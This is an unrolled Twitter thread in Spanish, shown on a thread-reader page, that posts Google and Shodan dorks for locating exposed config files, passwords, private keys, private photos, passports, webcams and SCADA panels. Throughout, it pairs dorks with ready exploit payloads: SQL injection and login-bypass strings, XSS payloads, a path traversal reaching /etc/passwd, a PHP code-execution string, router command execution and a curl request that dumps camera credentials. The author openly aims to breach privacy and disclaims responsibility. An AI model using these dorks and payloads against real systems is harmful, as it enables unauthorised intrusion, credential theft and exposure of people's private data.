Vamos a usar este tweet para publicar #Dorks de todo tipo, empecemos con este:

inurl:wp-config.php intext:DB_PASSWORD -stackoverflow -wpbeginner -foro -forum -topic -blog -about -docs -articles

#CyberSecurity #dork #BugBounty
intext:"pass" ! "usuario" | "user" | "contraseña" filetype:sql -github
Este es muy bueno, nos permite hacer uploads, ha sido probado con imágenes .jpeg

intitle:"FCKeditor - Uploaders Tests"
Este me gusta mucho, es un #Exploit en dónde hacemos uso de un #Dork para encontrar cámaras por internet y conseguir credenciales de administración 🧐

Shodan:
title:"SIEMENS IP-Camera"

Credenciales:
cgi-bin/chklogin.cgi?file=config.ini
#CyberSecurity #hacked #bugbountytips
Este es para encontrar dispositivos iCloud vulnerables, podemos ver todas las fotos 🧐🧐

intitle:"Index Of" intext:"iCloud Photos" OR intext:"My Photo Stream" OR intext:"Camera Roll"

*Nota: pueden modificar los parámetros otros resultados

#Cybersecurite #dork #bugbountytips
Este también es muy bueno, demasiado diría yo. Vamos a buscar páginas creadas en Joomla y con vulnerabilidad sql inyection:

inurl:/plugins/editors/jckeditor/plugins/jtreelink

#hacked #CyberSecurity
#BugBounty
⬇️⬇️⬇️⬇️
Exploit:http://site/path//plugins/editors/jckeditor/plugins/jtreelink/dialogs/links.php?extension=menu&view=menu&parent=%22%20UNION%20SELECT%20NULL,NULL,(%27payload%27),NULL,NULL,NULL,NULL,NULL--%20aa
⬆️⬆️⬆️⬆️
Este #Dork nos permite encontrar el archivo sftp-config.json el cual contiene las credenciales para acceder al servicio sftp, ftp o ftps:

intitle:"Index Of" intext:sftp-config.json

Que lo disfruten!!🤓🤓🤪

#cybersecurite #BugBounty #hacked #ftp
Confidencial ❌

Vamos a encontrar documentos "confidenciales"

filetype:"xls | xlsx | doc | docx | ppt | pptx | pdf" site:gov "FOUO" | "NOFORN" | "Confidential"

#dork #cybersecurite
Ahora un dork de shodan muy conocido por muchas personas y si no lo conoces, te invito a que lo pruebes!

Con este simple dork, encontrarán ftp con credenciales por defecto:

port:21 214-ADMIN_LOGIN

#dork #shodan #CyberSecurity #Pentesting
Vamos a sacar XSS🤓
El siguiente #dork nos permite encontrar el login de las paginas RUMPUS FTP Web File Manager. ya que este salió con la vulnerabilidad de inyección xss!

Google Dork: site:*.*.com "Web File Manager" inurl:?login=
Shodan Dork: Server: Rumpus
#xss #CyberSecurity
Este nos permite encontrar usuarios y claves de administradores, para modificar la web y se ven directamente en Google, sin necesidad de entrar en la página 🤓

ext:pwd inurl:(service | authors | administrators | users) “# -FrontPage-“ -github

#dork #bugbountytip
#cybersecurity
Un regalo de navidad!!! vamos a buscar paginas vulnerables a sql injection!

Dork: Design & Developed By: 82webmaster

payload:
contect.php?Id=-1+union+select+1+--+

#CyberSecurity #bugbounty #hacked #sql
Este #Dork nos permite encontrar el archivo db.conf, en dónde se encuentra información relacionada con la base de datos, tal como, usuario y contraseña.

intitle:"index of" "db.conf"

#cybersecurity #Pentesting #hacked
El siguiente #Dork nos permite encontrar directamente el archivo parameters.yml, el cual, contiene la información de bases de datos, usuarios y contraseñas:

"database_password" filetype:yml "config/parameters.yml

#cybersecurity #Hacking
vamos a encontrar paginas vulnerables a xss injection y html injection explotando el plugin "UserPro", mas específicamente, su libreria de instagram.

intitle:"Index of" intitle:"UserPro" -uploads

#Dork #CyberSecurity #hacked ⬇️
cuando tengamos vista la pagina, usamos este exploit:

wp-content/plugins/userpro/lib/instagram/vendor/cosenary/instagram/example/success.php?error=&error_description=<PAYLOAD>

y listo....
Ahora les comparto uno de mis favoritos de todos los tiempos! como un regalo de año nuevo🥳

"Powered by Virtual Radar Server" inurl:/VirtualRadar/

Este nos permite encontrar vuelos en tiempo real🤫
#dork #CyberSecurity #hacked

no me hago responsable de lo que hagan desde aquí
#dorks para encontrar cámaras
inurl:/sample/LvAppl/lvappl.htm
allinurl:control/multiview
intitle:"Live View / – AXIS"
inurl:ViewerFrame?Mode=Refresh
intitle:snc-rz30 inurl:home/
intitle:liveapplet inurl:LvAppl
inurl:\view\index.shtml
inurl:CgiStart?page=Single
#cybersecurity
Google #dorks para encontrar sistemas SCADA

intitle:”Miniweb Start Page”
inurl:”Portal/Portal.mwsl”

#scada #Pentesting
#hacked
#Dork para encontrar páginas vulnerables a #rce

>inurl:/webboard/index.php?category=

Pueden usar phpinfo:
${%40phpinfo()}

Ejemplo de Exploit:

/webboard/index.php?category=${@phpinfo()}webboard&page=&sequence=&listpage=

#cybersecurity #hack #bugbountytips
#Dork para encontrar sistemas jboss y testear si son vulnerables:
Shodan:
Server: Apache-Coyote/1.1 Tomcat-5.5
Google:
inurl:"8080/jmx-console"

Para verificar si son vulnerables usen:
github.com/joaomatosf/jex…
#Cybersecurite #hack #Pentesting
#Dork para encontrar sitios creados en #WordPress y con el tema #Fanzone 3.1, el cual es vulnerables a sql inyección.

Dork:Built with WordPress and WP FanZone site:ca

#Exploit y parámetro vulnerable:
/weeklySchedule.php?schoolid=&date=ALL&leagueid=&divisionid=[SQL Injection]
Vamos a encontrar el directorio /root/ en diferentes páginas web.

En la mayoría de los resultados pueden acceder hasta a los archivos:

/etc/passwd
/etc/shadow

para eso vamos a usar este #Dork

inurl:/sym/root/ intitle:index.of

#Cybersecurite
#pentesting #bugbountytips
De una simple alerta hasta un deface 💪

IceWarp WebMail vulnerable a xss

#Dork inurl:/webmail/ intext:Powered by IceWarp Server

Parametro vulenable: color

Solo agreguen el parámetro en la página"

pagina.com/webmail/?color=<payload>

#xss #hacked #cybersecurity #bugbounty
Vamos a buscar servidores web vulnerables que nos permiten acceder a la la ruta /proc/self/cwd directamente desde el navegador

inurl:/proc/self/cwd

#dork #CyberSecurity #hacked
Uno más, vamos a buscar archivos que contienen contraseñas 🤓

intitle:"index of" share.passwd OR cloud.passwd OR ftp.passwd -public

#Dork #cybersecurity #Pentesting #bugbountytips
Este #Dork nos dejará encontrar bases de datos de Microsoft acces, con el cual, podemos recolectar muy buena información:

accdb OR accde intitle:"index of" -pub -google -books

#cybersecurity #Database #Microsoft #bugbountytips
Vamos a entrar a los chat logs de varias páginas. No es muy útil pero es interesante 😆

#Dork intitle:"index of" "sms.log"

[Originator] => _Y000!_
[Destination] => todos_ustedes
[Message] => Feliz hacking

#hacking #CyberSecurity
Con este #Dork vamos a buscar archivos .env, los cuales se encuentran páginas web basadas en #laravel.

Este contiene información como, nombres de usuario, contraseña, además de toda la información relacionada con la base de datos.

filetype:env intext:APP_NAME
#cybersecurity
#dork para encontrar nombres de usuario y contraseña

intitle:"index.of" intext:"pass.txt"
Este es un #Dork multi-usos por así decirlo, ya que nos permite encontrar paginas vulnerables a:

-inyección xss
-inyección sql
-open redirect

inurl:"mobile/produit.php?titlefamille=

#payload:
"><svg/onload=document.location.href="pagina">

#CyberSecurity #Hacking #hacked
Jaja un pequeño error con las fotos, mandé la misma 3 veces, error de novato
El siguiente #dork nos permite encontrar información sensible para los servidores, ya sea, nombre de la base de datos, usuario y contraseña.

intitle:"index of" "env.bak"

#hacking #CyberSecurity #hacker
Este #Dork nos permite encontrar archivos de base de datos.

intitle: index of "*db.tar.gz"

#CyberSecurity #Linux
#Dork para encontrar paginas vulnerables a #xss

Este ataca una #vulnerabilidad de un tema de #wordpress, el cual se llama: Fruitful

intext:"Fruitful theme by fruitfulcode Powered by: WordPress" intext:"Comment" intext:"Leave a Reply"

#CyberSecurity #hacked #bugbountytips
#Dork para encontrar servidores haciendo uso de JBoss, el cual pueden explotar

intitle:"Welcome to JBoss"

#cybersecurity #hacked #Pentesting
Este #Dork ya ha sido reparado en muchos buscadores.
Ya sea:
Google
Duckduckgo
Yandex
Pero si buscan bien, pueden encontrar resultados aún
Últimamente #WhatsApp dejó libres los links de invitación para unirse a los grupos, muchas gracias a @JordanWildon y @wongmjane por la info.
#CMS Irani "Rosependar" vulnerable a sql inyection

#Dork:intext:"Powered By RoseCms" inurl:sec=

🔴Al encontrar las páginas, noten que los parámetros vulnerables son: sec y cat

🔴El index se encuentra en la siguiente dirección: /index.php?page=major/19

#cybersecurity #Hacked
La llave privada es una especie de clave que sólo debe poseer la persona asignada para el manejo de información importante.
Con este #dork vamos a encontrar claves privadas sueltas por internet

intitle:"index of" /"privatekey.txt" OR "private key.txt"
#cybersecurity #bugbounty
El siguiente #Dork es para encontrar páginas vulnerables a Directory traversal:

inurl:"laravel-filemanager?type=Files" -site:github.com -site:github.io

En este caso, la página vulnerable nos permite descargar el archivo passwd

#CyberSecurity #hacked
Una vez en lapágina, vamos a la ruta:

/laravel-filemanager/download?working_dir=

Y añadimos el siguiente #payload :

%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2F&type=&file=passwd
Los siguientes #Dorks son para encontrar el archivo "sftp_config.json", el cual contiene los opciones del ftp

⭕index of sftp-config.json

⭕index of sftp-config.json intext:2020

⭕intitle:index of intext:sftp-config.json

⭕index of js/sftp-config.json

#dork #cybersecurity
Vamos a encontrar paneles de phpMyAdmin en dónde podemos modificar la mayoría de las bases de datos encontradas:

intext:VIEWS · Server: - Database: information_schema - Table: SCHEMA_PRIVILEGES · Browse · Structure · SQL · Search · Export.

#dork #infosec #Hacked
#dorks para encontrar cámaras por internet 👨🏻‍💻

inurl:"MultiCameraFrame?Mode=Motion

"VB Viewer" inurl:/viewer/live/ja/live.html

#cybersecurity #infosec
Dorks para encontrar archivos con contraseñas:

intitle:"Index of" dbconnect.inc

"enable password" ext:cfg -git -cisco.com

password console-password ext:cfg -git

intext:authentication set encrypted-password ext:cfg

#dork #password
Dork para encontrar páginas vulnerables a sql login bypass

intext:"Created by: Worldviewer.in. "

Usen este payload en usuario y contraseña

'=' 'OR'

#bypass #sql #payloads #payload
WordPress Grimag Themes 1.2.5

Vamos a encontrar páginas creadas en WordPress vulnerables a redirección abierta, eso gracias el tema Grimag que es vulnerable.

inurl:/wp-content/themes/Grimag/

El parámetro vulenable es:

Go.php

#dork #Cybersecurite #cybersecurity
Vamos a romper la privacidad de las personas encontrando imágenes privadas alojadas en la carpeta dcim.

intitle:"Index Of" intext:"dcim"

#dork #infosec #cybersecurity #private #Hacked
Cómo sabemos, podemos encontrar de todo con los #dorks, en este caso le toca a los pasaportes.

index of /wp-content/uploads/passport

#CyberSecurity #infosec #OSINT
Los curriculum vitae son muuuy importantes para los trabajos ya que estos dan la información necesaria a la empresa, pero... Esto en otras manos?

#dork para encontrar currículum vitae

site:*.*.* “teléfono * * *” “dirección *” “e-mail” intitle:”curriculum vitae”

#CyberSecurity
Dorks para encontrar contraseñas de diferentes servicios:

intitle:"index of" "ssh.yml"
intitle:"index of" "database-old.yml"
intitle:"index of" "configuration.yml"
intitle:"index of" "database.yml"
intitle:"index of" "ftp.yml"

#dork #bugbountytip
#cybersecurity
Dork para encontrar salas de zoom

inurl:zoom.us/j and intext:texto

Ejemplo:
inurl:zoom.us/j and intext:scheduled

#dork #zoom #CyberSecurity
Dorks para encontrar páginas vulnerables a Local File Inclusion

intext:COPYRIGHT © 宜蘭民宿旅遊網
intext:COPYRIGHT © 花蓮民宿旅遊網
intext:"COPYRIGHT" inurl:?page=regulation.php

Vuln:

/Index.php?page=[lfi]

#dork #lfi #cybersecurity
dork para encontrar paginas wordpress con xmlrpc activo.

#dork #WordPress #cybersecurity #infosec
Dork para encontrar directorios sensibles en un servidor (HOME)

inurl:home/000~ROOT~000/

#dork #CyberSecurity
Dork para encontrar dispositivos vulnerables a rce:

Dork:TLR-2005KSH

De trata de un dispositivo router en cual tiene por defecto el directorio cgi-bin libre, en dónde podemos encontrar algunos parámetros que nos permiten ejecutar comandos del sistema

#dork #rce #CyberSecurity
Una ves dentro nos aparecerá la página de login por defecto.

Para acceder a la ejecución de comandos tenemos que acceder a la siguiente ruta:

http://ip/cgi-bin/admin.cgi?Command=sysCommand&Cmd=comando

Solo cambiamos la palabra "comando" y listo
Podemos ejecutar desde curl, wget, ping.. ya eso depende de ustedes
Dork para encontrar cámaras con credenciales expuestas.

inurl:device ext:rsp

solo hacemos un curl a la siguiente dirección y tendremos las credenciales:

curl "http://<ip>:<puerto>/device.rsp?opt=user&cmd=list" -H "Cookie: uid=admin"

#dork #CyberSecurity
Dorks para buscar información en páginas con el servicio de Amazon web:

password site:amazonaws.com filetype:xls

address site:amazonaws.com filetype:xls

Podemos cambiar el texto para más resultados

#dorks #CyberSecurity

• • •

Missing some Tweet in this thread? You can try to force a refresh
 

Keep Current with alert(Y000!)

alert(Y000!) Profile picture

Stay in touch and get notified when new unrolls are available from this author!

Read all threads

This Thread may be Removed Anytime!

PDF

Twitter may remove this content at anytime! Save it as PDF for later use!

Try unrolling a thread yourself!

how to unroll video
  1. Follow @ThreadReaderApp to mention us!

  2. From a Twitter thread mention us with a keyword "unroll"
@threadreaderapp unroll

Practice here first or read more on our help page!

Did Thread Reader help you today?

Support us! We are indie developers!


This site is made by just two indie developers on a laptop doing marketing, support and development! Read more about the story.

Become a Premium Member ($3/month or $30/year) and get exclusive features!

Become Premium

Too expensive? Make a small donation by buying us coffee ($5) or help with server cost ($10)

Donate via Paypal Become our Patreon

Thank you for your support!

Follow Us on Twitter!